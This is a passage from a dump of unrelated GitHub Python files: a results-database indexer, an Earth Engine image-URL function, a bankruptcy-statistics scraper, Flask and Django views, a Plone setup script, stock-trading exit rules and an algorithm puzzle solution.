simbaPath/\"results.db\"\n db = sqlite3.connect(str(databasename))\n db.text_factory = str\n cur= db.cursor()\n\n num_add = 0\n num_moved = 0\n num_bad = 0\n num_undead = 0 \n num_ghost = 0\n \n # \n # If the locations optional argument is specified, we will restrict our directory search to the\n # specified paths.\n # Here, identify all the possible parent directories or directories in which to search, then\n # store in 'abslocations'\n #\n if locations:\n abslocations = set()\n for l in locations:\n abslocations.add((workingDirectory/pathlib.Path(l)).resolve())\n \n for table in tables:\n if specifictable:\n if not table['name'] == specifictable:\n continue\n \n ret = dict()\n \n types = dict()\n directories = set([d.replace(str(simbaPath)+'/../','') for d in sorted(glob(str(str(simbaPath)+\"/../\"+table[\"match\"])))])\n \n #\n # If optional locations argument is provided, filter out those directories not\n # included. 
Otherwise, continue with all directories specified.\n #\n if locations:\n keep = set()\n for dir in directories:\n for abslocation in abslocations:\n if abslocation == pathlib.Path(dir).resolve():\n keep.add(dir)\n if abslocation in pathlib.Path(dir).resolve().parents:\n keep.add(dir)\n directories = keep\n \n #\n # Scan metadata files to determine columns\n #\n for directory in directories:\n try:\n data = scripts.parseOutputDir(str(simbaPath)+\"/../\"+directory)\n except Exception as e:\n data = None\n print(\"Error in \", directory)\n print(e)\n if data:\n types.update(database.getTypes(data))\n \n #\n # Update/create the chosen table so all the values are represented\n #\n entries = database.getTableEntries(cur,table['name'])\n if (len(entries) > 0 or len(directories) > 0) and mode=='add' :\n database.updateTable(cur,table['name'],types,\"results\",False)\n \n #\n # If there are tables to delete, delete them\n # TODO\n #if args.remove:\n # for tab in list(args.remove):\n # cur.execute('DROP TABLE ' + tab)\n \n \n entries = database.getTableEntries(cur,table['name'])\n \n #\n # Scan each metadata file and add an entry to the table, skipping any\n # records that already exist.\n #\n new = []\n moved = []\n bad = []\n undead = []\n for directory in directories:\n if not os.path.isdir(directory): continue\n dirname = directory\n try:\n dirhash = scripts.getHash(str(simbaPath)+\"/../\"+directory)\n data = scripts.parseOutputDir(str(simbaPath)+\"/../\"+directory)\n except Exception as e:\n data = None\n \n if not data or not dirhash:\n if dirname in [e[1] for e in entries]:\n undead.append(dirname)\n else:\n bad.append(dirname)\n continue\n \n status = \"new\"\n for e in entries:\n if dirhash == e[0] and dirname == e[1]:\n status = \"old\"\n break\n elif dirhash == e[0] and not dirname == e[1]:\n status = \"moved\"\n moved.append([e[1],dirname])\n break\n if status == \"new\":\n new.append(dirname)\n \n if not dirhash:\n raise Exception(\"parseOutputDir.parse MUST include a HASH in its output\")\n if mode == \"add\":\n if status == \"new\":\n if(verbose): print('\\033[32madded ',dirname,'\\033[1;0m')\n database.updateTable(cur,table['name'],types,\"results\",False) ## TODO remove this\n database.updateRecord(cur,table['name'],data,dirhash,dirname,False)\n elif status == \"moved\":\n if(verbose): print('\\033[33mmoved ',moved[-1][0],'\\033[1;0m')\n if(verbose):print('\\033[33m тоб',moved[-1][1],'\\033[1;0m')\n database.updateRecord(cur,table['name'],data,dirhash,dirname,False)\n elif updateall:\n if(verbose):print('\\033[32mupdated ',dirname,'\\033[1;0m')\n database.updateRecord(cur,table['name'],data,dirhash,dirname,False)\n if mode == \"status\":\n if len(new)>0 or len(moved)>0 or len(bad)>0:\n for n in new:\n if(verbose): print('\\033[32mnew ',n,'\\033[1;0m')\n for m in moved:\n if(verbose): print('\\033[33mmoved ',m[0],'\\033[1;0m')\n if(verbose): print('\\033[33m тоб',m[1],'\\033[1;0m')\n for b in bad:\n if(verbose): print('\\033[31mbad ',b,'\\033[1;0m')\n \n if (len(entries) > 0 or len(directories) > 0) and mode=='add':\n database.updateTable(cur,table['name'],types,\"results\",False)\n \n \n entries = database.getTableEntries(cur,table['name'])\n for e in entries:\n directory = e[1]\n \n if directory == 'null': continue\n \n tablehash = e[0]\n try:\n dirhash = scripts.getHash(directory)\n except Exception as e:\n dirhash = None\n \n ghost = False\n if not dirhash: ghost = True\n if tablehash != dirhash: ghost = True\n \n if ghost:\n if directory in undead:\n if(verbose): 
print('\\033[90mundead '+directory+' missing metadata file ('+tablehash+')')\n else:\n if(verbose): print('\\033[90mghost ('+tablehash+') \\033[9m'+directory+'\\033[0m')\n num_ghost += 1\n #if mode == 'add': ## Let's NOT do this. \n # database.updateRecord(cur,table['name'], None, tablehash, 'null')\n \n num_add += len(new)\n num_moved += len(moved)\n num_bad += len(bad) \n num_undead += len(undead) \n\n ret['new'] = new\n ret['moved'] = moved\n ret['bad'] = bad\n ret['undead'] = undead\n retlist.append(ret)\n\n if(verbose): print()\n if(verbose): print('\\033[32mnew: ',num_add,'\\033[1;0m')\n if(verbose): print('\\033[33mmove: ',num_moved,'\\033[1;0m')\n if(verbose): print('\\033[31mbad: ',num_bad,'\\033[1;0m')\n if(verbose): print('\\033[90mundead: ',num_undead,'\\033[1;0m')\n if(verbose): print('\\033[90mghost: ',num_ghost,'\\033[1;0m')\n \n db.commit()\n db.close()\n\n return retlist\n \n\n\n \n","repo_name":"solidsgroup/simba","sub_path":"simba/simba_add.py","file_name":"simba_add.py","file_ext":"py","file_size_in_byte":9161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35177760990","text":"import ee\nimport json\nimport numpy as np\nimport ee_collection_specifics\n\naccount = 'skydipper@skydipper-196010.iam.gserviceaccount.com'\ncredentials = ee.ServiceAccountCredentials(account, 'privatekey.json')\nee.Initialize(credentials)\n\ndef ThumbURL(image, viz_params=None):\n \"\"\"Create a target url for tumb for an image.\n \"\"\"\n if viz_params:\n url = image.getThumbURL(viz_params)\n else:\n url = image.getThumbURL()\n return url\n\ndef TileURL(image, viz_params=None):\n \"\"\"Create a target url for tiles for an image.\n \"\"\"\n if viz_params:\n d = image.getMapId(viz_params)\n else:\n d = image.getMapId()\n base_url = 'https://earthengine.googleapis.com'\n url = (base_url + '/map/' + d['mapid'] + \"/{z}/{x}/{y}?token=\"+ d['token'])\n return url\n \ndef composite(request):\n request = request.get_json()\n\n # Geometry\n lon = request.get('lon')\n lat = request.get('lat')\n # Instrument\n collection = request.get('instrument')\n # Start and stop of time series\n startDate = ee.Date(request.get('start'))\n stopDate = ee.Date(request.get('end'))\n \n ## Area of Interest\n point = ee.Geometry.Point([lon, lat]).buffer(1000)\n # bounding box\n coordinates = np.array(point.bounds().getInfo()['coordinates'][0])\n bbox = [min(coordinates[:,0]), min(coordinates[:,1]), max(coordinates[:,0]), max(coordinates[:,1])]\n # Rectangle\n geom = ee.Geometry.Rectangle(bbox)\n region = geom.bounds().getInfo()['coordinates']\n\n # Bands\n bands = ee_collection_specifics.ee_bands_rgb(collection)\n # Visualiztion parameters\n visParam = ee_collection_specifics.vizz_params_rgb(collection)\n\n # Image Collection\n image_collection = ee_collection_specifics.ee_collections(collection) \n ## Composite\n image = ee_collection_specifics.Composite(collection)(image_collection, startDate, stopDate, geom)\n \n ## Select bands\n image = image.select(bands)\n\n ## Get ThumbURL\n thumb_url = ThumbURL(image, {'min':visParam['min'],'max':visParam['max'], 'region': region, 'dimensions': [256,256]})\n\n ## Get TileURL\n tile_url = TileURL(image.clip(geom), {'min':visParam['min'],'max':visParam['max']})\n \n return json.dumps({'thumb_url': thumb_url, 'tile_url': tile_url, 'bbox': 
bbox})","repo_name":"Skydipper/CNN-tests","sub_path":"notebooks/Google_Cloud_Functions/composite/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"2286173407","text":"import numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport calendar\n\n# List of conties\ncounties = [\"Troms og Finnmark\", \"Nordland\", \"Trøndelag\", \"Møre og Romsdal\", \"Vestland\", \"Rogaland\", \"Agder\", \"Vestfold og Telemark\", \"Viken\", \"Oslo\", \"Innlandet\",\"Svalbard\",\"Utenlands\"]\n\n# Months in a year in numeric\nmonths = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\"]\n\ndef daysInEachMonth(year):\n ''' Method to find out number of days in each month in a specific year '''\n days = []\n for i in range(1,13):\n days.append(calendar.monthrange(year, i)[1])\n\n return days\n\ndef parse_rows(response, i, results):\n '''\n Method that parses the response text and evaluates each element\n '''\n # Parse the response text\n soup = BeautifulSoup(response.text, 'html.parser')\n\n county = None\n counter = 0\n\n # Find all tr elements in the response\n for tr in soup.findAll('tr'):\n\n # Check if row value is a county\n if tr.text.strip() in counties:\n month = None\n\n # Store result of the month to the county dictionary\n if county != None:\n month = i+1 \n results[county][month] = counter\n\n # Set counter zero for next county\n counter = 0\n county = tr.text.strip()\n\n # If the county is not in the result dictionary - add key to dictionary\n if county not in results:\n results[county] = {}\n\n else:\n # If the value is not a county\n text = tr.text.strip()\n\n # Check if the value is \"Konkuråpning\" if it is - add another to the result\n if \"Konkursåpning\" in text:\n counter += 1\n\ndef scrapeWeb(days, year, results):\n '''\n Method that scrapes all months in a year. \n A new url is generate for each months in the year. 
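The per-month URL scheme that `scrapeWeb` builds can be sketched in isolation. The base URL and query parameters below are copied from the snippet above; `calendar.monthrange` supplies the last day of each month (handling leap years), so each query spans exactly one calendar month:

import calendar

def month_urls(year):
    # One query URL per month, from the 1st to the last day of that month.
    # Base URL and parameters are taken from the scrapeWeb snippet above.
    base = ("https://w2.brreg.no/kunngjoring/kombisok.jsp"
            "?datoFra=01.{m}.{y}&datoTil={d}.{m}.{y}"
            "&id_region=0&id_niva1=51&id_niva2=56&id_bransje1=0")
    for month in range(1, 13):
        last_day = calendar.monthrange(year, month)[1]  # day count; leap-year aware
        yield base.format(m=f"{month:02d}", y=year, d=last_day)

for url in month_urls(2020):
    print(url)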
\n '''\n # Loop as many times as it is months\n for i in range(len(months)):\n\n # Format a new url based on which month, number of days in the month and year\n url = (\"https://w2.brreg.no/kunngjoring/kombisok.jsp?datoFra=01.{}.{}&datoTil={}.{}.{}&id_region=0&id_niva1=51&id_niva2=56&id_bransje1=0\").format(months[i], year,days[i], months[i], year) \n \n # Send get request to the formatted url\n response = requests.get(url)\n\n parse_rows(response, i, results)\n\ndef calculateCumulative(liste, year):\n ''' Calculate cumulative '''\n for index,i in enumerate(liste):\n\n # If first element in list - do nothing\n if(index == 0):\n continue\n else:\n # Add the sum of the previous element\n liste[index] = i + liste[index - 1]\n \n return liste\n\ndef makeDataFrameAndPlotFigure(resultat_2019, resultat_2020):\n ''' Method to make the two data frames and plot the results for all conties '''\n\n # All months in 2019\n monts = ['Jan', 'Feb', 'Mar', 'Apr', 'Mai', 'Jun','Jul','Aug', 'Sep', 'Oct','Nov', 'Dec']\n\n # Only the nine first months in 2020\n monts_2020 = ['Jan', 'Feb', 'Mar', 'Apr', 'Mai', 'Jun','Jul','Aug', 'Sep']\n\n # Dataframe for 2019 with result of 12 months\n df_2019 = pd.DataFrame(columns=['2019'])\n df_2019['Months'] = monts\n\n # Dataframe for 2020 - only nine first months\n df_2020 = pd.DataFrame(columns=['2020'])\n df_2020['Months'] = monts[:9] \n\n # Go through all names in the county list\n for i in counties:\n counter = 1\n liste = []\n liste_2020 = []\n\n # Append the result for all 12 monts for both years\n while counter < 13:\n\n try:\n # Check if the month has any bankruptcies\n liste.append(resultat_2019[i][counter])\n except:\n # If the month had no bankruptcies add a zero to the list\n liste.append(0)\n try:\n liste_2020.append(resultat_2020[i][counter])\n except:\n liste_2020.append(0)\n counter += 1\n\n # Calculate cumulative number for both years\n liste = calculateCumulative(liste, 2019)\n liste_2020 = calculateCumulative(liste_2020, 2020)\n \n # Append the cumulative result into the dataframes\n df_2019['2019'] = liste\n df_2020['2020'] = liste_2020[:9]\n\n # Plot the line of 2020\n ax = df_2020.plot(x = 'Months', y = '2020')\n\n # Plot the line for 2019 i same plot\n df_2019.plot(x = 'Months', y = '2019',ax=ax)\n\n # Set limit for x and y\n plt.xticks(list(range(0,12)), monts)\n plt.ylim([0,1100])\n\n # Set title of figure\n plt.title(i)\n\n # Save figure\n plt.savefig(i)\n\ndef run():\n # Dictionaries for storing the results of each year\n banckrupcies_2019 = {}\n banckrupcies_2020 = {} \n\n days = daysInEachMonth(2019)\n days_2020 = daysInEachMonth(2020)\n scrapeWeb(days, 2019, banckrupcies_2019)\n scrapeWeb(days_2020, 2020, banckrupcies_2020)\n makeDataFrameAndPlotFigure(banckrupcies_2019, banckrupcies_2020)\n\nif __name__ == \"__main__\":\n run()","repo_name":"hellesand/Assignment-3-5-Data-Science","sub_path":"Assignment-6/Assignment-6.py","file_name":"Assignment-6.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26888483075","text":"# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\nfrom flask import (\n current_app as app,\n render_template,\n request\n)\nfrom flask.views import View\n\nfrom dashboard.utils.backend import get_search_parameters\n\n\nclass GeneralJobsView(View):\n\n PAGE_TITLE = app.config.get(\"DEFAULT_PAGE_TITLE\")\n JOB_PAGES_TITLE = \"%s — %s\" % (PAGE_TITLE, \"Job Reports\")\n\n\nclass JobsAllView(GeneralJobsView):\n def dispatch_request(self):\n body_title = \"Available Jobs\"\n search_filter, page_len = get_search_parameters(request)\n return render_template(\n \"jobs-all.html\",\n body_title=body_title,\n page_len=page_len,\n page_title=self.JOB_PAGES_TITLE,\n search_filter=search_filter\n )\n\n\nclass JobsJobView(GeneralJobsView):\n def dispatch_request(self, **kwargs):\n body_title = \"Details for «%s»\" % kwargs[\"job\"]\n search_filter, page_len = get_search_parameters(request)\n return render_template(\n \"jobs-job.html\",\n body_title=body_title,\n job=kwargs[\"job\"],\n page_len=page_len,\n page_title=self.PAGE_TITLE,\n search_filter=search_filter\n )\n","repo_name":"joyxu/kernelci-frontend","sub_path":"app/dashboard/views/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73261786753","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.5dev'\n\nsetup(name='dexterity.draftspreviewbehavior',\n version=version,\n description=\"Preview behavior to show modified content before saving in default view\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n ],\n keywords='plone draft dexterity content',\n author='Jason Mehring',\n author_email='jason@canadapop.com',\n url='http://plone.org',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['dexterity'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'rwproperty',\n 'ZODB3',\n 'zope.interface',\n 'zope.component',\n 'zope.schema',\n 'zope.annotation',\n 'plone.app.intid',\n 'Zope2',\n 'plone.dexterity',\n 'plone.app.drafts'\n ],\n #extras_require={\n # 'tests': ['collective.testcaselayer', 'Products.PloneTestCase'],\n #},\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","repo_name":"collective/dexterity.draftspreviewbehavior","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10033128620","text":"\nfrom django.template import Template, Context\nfrom django.http import HttpResponse\nfrom django.db import models\nfrom django.shortcuts import redirect\n\ndef regards(request): #first view\n return HttpResponse(\"Hello World Django\") \n\ndef web_page(request):\n doc_externo = open(\"C:/Users/Alexander/Documents/BYU/BYU-Alex/CSE310/djangoPython/WebApp/WebApp/templates/plantilla.html\")\n plt = Template(doc_externo.read())\n doc_externo.close()\n ctx = Context()\n document = plt.render(ctx)\n return HttpResponse(document)\n\ndef register_client(request):\n name = 
request.GET['name']\n email = request.GET['email']\n subject = request.GET['subject']\n message = request.GET['message']\n\n clients = models.Client.objects.create(\n name = name,\n email = email,\n subject = subject,\n message = message\n )\n return redirect('/')","repo_name":"alexandercalva/djangoPython","sub_path":"WebApp/WebApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25052528356","text":"\"\"\"Need 1 instance of each exit rule for every ticker.\"\"\"\n\nclass ExitRule:\n def __init__(self):\n self.exit = False\n self.exitRuleName=None\n\n def __call__(self, *args, **kwargs):\n \"\"\"This has to return bool\"\"\"\n raise NotImplementedError(\"You need to implement this, buddy.\")\n\nclass EndOfDay(ExitRule):\n def __init__(self):\n \"\"\"time is a tuple with (hour, minute)\"\"\"\n super().__init__()\n self.trig_hour = 15\n self.trig_minute = 45\n self.exitRuleName=\"End of Day\"\n\n def __call__(self, *args, **kwargs):\n hr = kwargs[\"hour\"]\n minute = kwargs[\"minute\"]\n return (hr == self.trig_hour and minute >= self.trig_minute) or (hr > self.trig_hour)\n\nclass HitProfitTarget(ExitRule):\n def __init__(self, entry_price, isBull):\n \"\"\"isBull = True for long position, false for short position\"\"\"\n super().__init__()\n self.exitRuleName=\"Hit Profit Target\"\n self.percent_profit_target = 1\n self.entry_price = entry_price\n self.isBull = isBull\n\n def __call__(self, *args, **kwargs):\n if self.isBull:\n return (kwargs[\"price\"] >= self.entry_price * (1 + self.percent_profit_target / 100))\n else:\n return (kwargs[\"price\"] <= self.entry_price * (1 - self.percent_profit_target / 100))\n\n\nclass HitLossLimit(ExitRule):\n def __init__(self, entry_price, isBull):\n \"\"\"isBull = True for long position, false for short position\"\"\"\n super().__init__()\n self.exitRuleName=\"Hit Loss Limit\"\n self.loss_limit = 0.8\n self.entry_price = entry_price\n self.isBull = isBull\n\n def __call__(self, *args, **kwargs):\n if self.isBull:\n return (kwargs[\"price\"] <= self.entry_price * (1 - self.loss_limit/100))\n else:\n return (kwargs[\"price\"] >= self.entry_price * (1 + self.loss_limit / 100))\n\nclass Loose2Tight(ExitRule):\n def __init__(self, entryPrice, isBull, threshPercent=0.3, trailPercent=1, fastRatio=2):\n \"\"\"Exit threshold starts out like a trail stop, but trail % tightens up as price moves\n in the right direction.\"\"\"\n super().__init__()\n assert(isinstance(isBull, bool))\n assert (threshPercent >= 0)\n assert(fastRatio >= 1)\n self.entryPrice = entryPrice\n self.isBull = isBull\n self.prevPrice = entryPrice\n self.fastRatio = fastRatio\n if isBull:\n self.exitThresh = entryPrice * (1 - trailPercent / 100)\n self.threshPrice = entryPrice * (1 + threshPercent / 100)\n else:\n self.exitThresh = entryPrice * (1 + trailPercent / 100)\n self.threshPrice = entryPrice * (1 - threshPercent / 100)\n\n def __call__(self, *args, **kwargs):\n if \"price\" in kwargs.keys():\n price = kwargs[\"price\"]\n else:\n price = args[0]\n if self.isBull:\n if price > self.threshPrice and price > self.prevPrice:\n # increase exitThresh by fastratio\n delta = price - self.prevPrice\n self.exitThresh += delta * self.fastRatio\n self.prevPrice = price\n elif price > self.prevPrice and price > self.prevPrice:\n # increase exitThresh 1:1\n delta = price - self.prevPrice\n self.exitThresh += delta\n self.prevPrice = price\n else:\n # If price went 
down, do nothing.\n pass\n\n # Return position close decision:\n return price < self.exitThresh\n\n else:\n if price < self.threshPrice and price < self.prevPrice:\n # decrease exitThresh by fastRatio\n delta = self.prevPrice - price\n self.exitThresh -= delta * self.fastRatio\n self.prevPrice = price\n elif price < self.prevPrice and price < self.prevPrice:\n # decrease exitThresh 1:1\n delta = self.prevPrice - price\n self.exitThresh -= delta\n self.prevPrice = price\n else:\n # If price went up, do nothing.\n pass\n\n return price > self.exitThresh\n\ndef testLoose2Tight():\n # First test long:\n print(\"Testing Long\")\n price = 100\n uut = Loose2Tight(entryPrice=price, isBull=True, threshPercent=0.5, trailPercent=1, fastRatio=2)\n print(\"threshPrice prevPrice exitThresh price result\")\n for m in range(120):\n price += 0.05 if m % 2 == 0 else -0.03\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n for m in range(40):\n price -= 0.01\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n\n # Now Test Short\n print(\"\\n\\n\\n\\nNow Testing Short\")\n price = 100\n uut = Loose2Tight(entryPrice=price, isBull=False, threshPercent=0.5, trailPercent=1, fastRatio=2)\n print(\"threshPrice prevPrice exitThresh price result\")\n for m in range(120):\n price += -0.05 if m % 2 == 0 else 0.03\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n for m in range(40):\n price += 0.01\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n\nclass DontCatchUp(Loose2Tight):\n \"\"\"Like Loose2Tight except this one does not catch up with the stock. 
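For contrast with `Loose2Tight` above — whose threshold advances at `fastRatio` times the price move once price clears `threshPrice` — a conventional trailing stop ratchets 1:1 from the running high and never loosens. A minimal, hypothetical long-side sketch (not part of the original module):

class PlainTrailStop:
    def __init__(self, entry_price, trail_percent=1.0):
        self.high = entry_price             # running high-water mark
        self.trail = trail_percent / 100.0

    def __call__(self, price):
        if price > self.high:
            self.high = price               # ratchet up, never down
        return price < self.high * (1.0 - self.trail)  # True -> exit

stop = PlainTrailStop(100.0, trail_percent=1.0)
for p in (100.2, 101.0, 100.5, 99.9):
    print(p, stop(p))                       # exits only on the last tick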
This one will not return True\n until price has changed direction.\"\"\"\n def __init__(self, entryPrice, isBull, threshPercent1=0.3, threshPercent2=0.7, trailPercent=1, fastRatio=2):\n super().__init__(entryPrice=entryPrice, isBull=isBull, threshPercent=threshPercent1, \\\n trailPercent=trailPercent, fastRatio=fastRatio)\n if isBull:\n self.secondThreshPrice = entryPrice * (1 + threshPercent2 / 100)\n else:\n self.secondThreshPrice = entryPrice * (1 - threshPercent2 / 100)\n\n def __call__(self, *args, **kwargs):\n if \"price\" in kwargs.keys():\n price = kwargs[\"price\"]\n else:\n price = args[0]\n if self.isBull:\n if price > self.secondThreshPrice and price > self.prevPrice:\n # increase exitThresh 1:1\n delta = price - self.prevPrice\n self.exitThresh += delta\n self.prevPrice = price\n elif price > self.threshPrice and price > self.prevPrice:\n # increase exitThresh by fastratio\n delta = price - self.prevPrice\n self.exitThresh += delta * self.fastRatio\n self.prevPrice = price\n elif price > self.prevPrice and price > self.prevPrice:\n # increase exitThresh 1:1\n delta = price - self.prevPrice\n self.exitThresh += delta\n self.prevPrice = price\n else:\n # If price went down, do nothing.\n pass\n # Return position close decision:\n return price < self.exitThresh\n\n else:\n if price < self.secondThreshPrice and price < self.prevPrice:\n # decrease exitThresh 1:1\n delta = self.prevPrice - price\n self.exitThresh -= delta\n self.prevPrice = price\n elif price < self.threshPrice and price < self.prevPrice:\n # decrease exitThresh by fastRatio\n delta = self.prevPrice - price\n self.exitThresh -= delta * self.fastRatio\n self.prevPrice = price\n elif price < self.prevPrice and price < self.prevPrice:\n # decrease exitThresh 1:1\n delta = self.prevPrice - price\n self.exitThresh -= delta\n self.prevPrice = price\n else:\n # If price went up, do nothing.\n pass\n return price > self.exitThresh\n\ndef testDontCatchUp():\n # First test long:\n print(\"Testing Long\")\n price = 100\n uut = DontCatchUp(entryPrice=price, isBull=True, threshPercent1=0.3, threshPercent2=0.7, trailPercent=1, fastRatio=3)\n print(\"threshPrice prevPrice exitThresh price result\")\n for m in range(100):\n price += 0.10 if m % 2 == 0 else -0.03\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n for m in range(50):\n price -= 0.01\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n\n # Now Test Short\n print(\"\\n\\n\\n\\nNow Testing Short\")\n price = 100\n uut = DontCatchUp(entryPrice=price, isBull=False, threshPercent1=0.25, threshPercent2=0.7, trailPercent=1, fastRatio=2.8)\n print(\"threshPrice prevPrice exitThresh price result\")\n for m in range(100):\n price += -0.10 if m % 2 == 0 else 0.03\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n for m in range(50):\n price += 0.01\n result = uut(price=price)\n oneStr = \" %03.2f %03.2f %03.2f %03.2f %1d\" % (uut.threshPrice, uut.prevPrice, uut.exitThresh, price, result)\n print(oneStr)\n\nclass SoftTrailStop(ExitRule):\n \"\"\"Put the 2:1 wrong way stuff here\"\"\"\n pass\n\nclass LowestPerformer(ExitRule):\n \"\"\"Unlike others, do not necessarily call this every sample.\n Call this when you get a trigger on something else, and you want\n 
to ditch the lowest performer.\n\n Also, unlike others, you want 1 instance for all tickers.\"\"\"\n def __init__(self):\n super().__init__()\n self.exitRuleName = \"Lowest Performer\"\n self.entryPrices = {} # % profit on competing positions\n self.nowPrices = {}\n self.isBull = {}\n\n def addTicker(self, ticker, entryPrice, isBull):\n self.entryPrices[ticker] = entryPrice\n self.nowPrices[ticker] = entryPrice\n self.isBull[ticker] = isBull\n\n def updateTicker(self, ticker, nowPrice):\n self.nowPrices[ticker] = nowPrice\n\n def __call__(self, *args, **kwargs):\n worstTicker = \"\"\n worstPayoff = 1E20\n for ticker in self.entryPrices.keys():\n if self.isBull[ticker]:\n onePayoff = self.nowPrices[ticker] - self.entryPrices[ticker]\n else:\n onePayoff = self.entryPrices[ticker] - self.nowPrices[ticker]\n onePercentage = 100 * onePayoff / self.entryPrices[ticker]\n if onePercentage < worstPayoff:\n worstPayoff = onePercentage\n worstTicker = ticker\n return (worstTicker, worstPayoff)\n\nclass PoopinAround(ExitRule):\n \"\"\"If it hasn't moved 1/2 a % in the last 2 hours, ditch it.\"\"\"\n def __init__(self, entryPrice, entranceTime, isBull):\n super().__init__()\n self.thresh1 = 0.1 # After 1 hr, it should move this much\n self.thresh2 = 0.33 # After 2 hr, it should move this much\n self.thresh3 = 0.67 # After 3 hr, it should move this much\n self.isBull = isBull\n self.entranceTime = entranceTime\n self.entryPrice = entryPrice\n\n def __call__(self, *args, **kwargs):\n now = kwargs[\"epoch\"]\n price = kwargs[\"price\"]\n if now >= self.entranceTime + 3*3600:\n if self.isBull:\n return price <= self.entryPrice * (1 + self.thresh3 / 100)\n else:\n return price >= self.entryPrice * (1 - self.thresh3 / 100)\n elif now >= self.entranceTime + 2*3600:\n if self.isBull:\n return price <= self.entryPrice * (1 + self.thresh2 / 100)\n else:\n return price >= self.entryPrice * (1 - self.thresh2 / 100)\n elif now >= self.entranceTime + 1*3600:\n if self.isBull:\n return price <= self.entryPrice * (1 + self.thresh1 / 100)\n else:\n return price >= self.entryPrice * (1 - self.thresh1 / 100)\n else:\n return False\n\nclass TimeLimit(ExitRule):\n \"\"\"Returns True if a position has been in the market for longer than timeLimit.\"\"\"\n def __init__(self, entranceTime, timeLimit):\n super().__init__()\n self.entranceTime = entranceTime\n self.timeLimit = timeLimit\n\n def __call__(self, *args, **kwargs):\n return kwargs[\"now\"] > self.entranceTime + self.timeLimit\n\nclass MinimumTime(ExitRule):\n \"\"\"Returns True if a position has been in the market for at least minTime.\n Algorithmically this is no difference from TimeLimit, but has names better suited\n for enabling other exit rules. 
For example, you might want some exit rules to only\n be enabled after a minimum amount of time.\n\n Note: You can also use this to ensure that a position stays CLOSED for a minimum\n length of time before opening a new position on the same ticker.\"\"\"\n def __init__(self, entranceTime, minTime):\n super().__init__()\n self.entranceTime = entranceTime\n self.minTime = minTime\n\n def __call__(self, *args, **kwargs):\n return kwargs[\"now\"] > self.entranceTime + self.minTime\n\nif __name__==\"__main__\":\n testDontCatchUp()\n\n\n\n\n\n\n\n","repo_name":"jstr045329/public_IB_data_ac","sub_path":"ExitRules.py","file_name":"ExitRules.py","file_ext":"py","file_size_in_byte":13999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15848596576","text":"n = int(input())\narr = list(map(int,input().split()))\nadd, mi, mu, did = map(int,input().split())\nmaxnum = -1e9\nminimum= 1e9\ndef dfs(depth, total, plus, minus, multiply,divide):\n global maxnum,minimum\n if depth==n:\n maxnum=max(total,maxnum)\n minimum=min(total,minimum)\n return\n\n if plus:\n dfs(depth+1,total+arr[depth],plus-1,minus,multiply,divide)\n if minus:\n dfs(depth+1,total-arr[depth],plus,minus-1,multiply,divide)\n if multiply:\n dfs(depth+1,total*arr[depth],plus,minus,multiply-1,divide)\n if divide:\n dfs(depth+1,int(total/arr[depth]),plus,minus,multiply,divide-1)\n\ndfs(1,arr[0],add,mi,mu,did)\nprint(maxnum)\nprint(minimum) ","repo_name":"gwonjihun/Algorithm","sub_path":"mid_exam/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 